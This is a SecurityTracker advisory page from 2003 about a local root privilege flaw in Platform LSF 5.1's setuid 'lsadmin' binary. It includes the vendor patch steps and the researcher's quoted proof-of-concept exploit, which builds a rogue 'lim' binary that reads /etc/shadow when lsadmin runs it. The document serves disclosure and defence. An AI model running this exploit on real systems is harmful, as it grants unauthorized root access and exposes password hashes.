SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Platform LSF Vendors:   Platform Computing Inc.
Platform LSF Privilege Flaw Lets Local Users Execute Arbitrary Code with Root Privileges
SecurityTracker Alert ID:  1006821
SecurityTracker URL:  http://securitytracker.com/id/1006821
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 23 2003
Impact:   Root access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 5.1
Description:   A vulnerability was reported in Platform Computing's Platform LSF distributed computing software. A local user can gain root privileges.

It is reported that a local user can cause the 'lsadmin' binary to execute arbitrary code. The binary is reportedly configured with set user id (setuid) root privileges, so the arbitrary code will run with root privileges.

A local user can set the LSF_ENVDIR variable to cause 'lsadmin' to use an alternate 'lsf.conf' file. The local user can also set the LSF_SERVERDIR variable in the 'lsf.conf' file to an alternate path containing a malicious 'lim' binary. Then, the 'lsadmin' ckconfig command can be used to invoke the malicious 'lim' code with root privileges.

Some demonstration exploit code is provided in the Source Message.

The following timeline is provided:

Vendor notified: 25 Feb 2003
Vendor response: 25 Feb 2003
Vendor fix: 19 Mar 2003

Impact:   A local user can cause arbitrary code to be executed with root privileges.
Solution:   A patch for 'lsadmin' is available at:

ftp://ftp.platform.com

location: /patches/5.1/patch/sup_by_dev33993/
file: lsadmin5.1_<os>.Z

Download the patch. Then, in the LSF_BINDIR, move old lsadmin to lsadmin.old. Uncompress and rename the downloaded binary to lsadmin, then move new lsadmin to LSF_BINDIR. The permissions of the new lsadmin binary should be 4755.

For more information or to obtain a password to download the patch, contact the vendor at support@platform.com.

Vendor URL:  www.platform.com/products/wm/LSF/index.asp (Links to External Site)
Cause:   Access control error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  Security advisory: LSF 5.1 local root exploit



	             Security Advisory

	                22 May 2003

	           Local root in LSF 5.1


Name:            Load Sharing Facility version 5.1
Severity:        High
Vendor URL:      http://www.platform.com
Author:          Tomasz Grabowski (cadence@aci.com.pl)
Vendor notified: 25 Feb 2003
Vendor response: 25 Feb 2003
Vendor fix:      19 Mar 2003

Commercial:      I'm looking for a new job


Impact: An attacker can gain root priviledge by forcing the 'lsadmin'
	binary to execute code of attackers choice. The 'lsadmin' binary
	is setuid root.


Description:

The 'lsadmin' binary has a "ckconfig" command. It uses it to check the
correctness of config files. Right after it starts, it is using the
external 'lim' binary . It is using the LSF_SERVERDIR variable in lsf.conf
file to obtain a path for 'lim' binary. Regular user can make his own
lsf.conf file and, by using the LSF_ENVDIR variable, force 'lsadmin' to
use it instead of default /etc/lsf.conf file. Attacker can therefore point
the LSF_SERVERDIR variable to his own 'lim' binary.  The attackers 'lim'
binary will be executed with setuid root priviledges.


How to patch:

1) Download the lsadmin patch from Platform ftp site

ftp ftp.platform.com
location: /patches/5.1/patch/sup_by_dev33993/
file: lsadmin5.1_<os>.Z

If you do not have username/password to access ftp.platform.com, contact
support@platform.com

2) In the LSF_BINDIR, move old lsadmin to lsadmin.old.
Uncompress and rename downloaded binary to lsadmin.
Move new lsadmin to LSF_BINDIR. Make sure permissions are 4755.

For more information on patch or related questions, contact
support@platform.com



Exploit:


# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ

# Proof of concept - for educational purposes only!

cat <<__END__> attacker_code.c
#include <stdio.h>
int main() {
FILE *secret_file;
FILE *temp_file;
char one_line[128];
setuid(0);setgid(0);
secret_file = fopen("/etc/shadow", "r");
temp_file = fopen(".temp.file", "w");
fgets(one_line, 120, secret_file);
fputs(one_line, temp_file);
fclose(secret_file); fclose (temp_file);
}
__END__

gcc attacker_code.c -o lim
chmod 777 lim
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file



---
Tomasz Grabowski  (0-91)4494234
Akademickie Centrum Informatyki
mailto:cadence@man.szczecin.pl



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC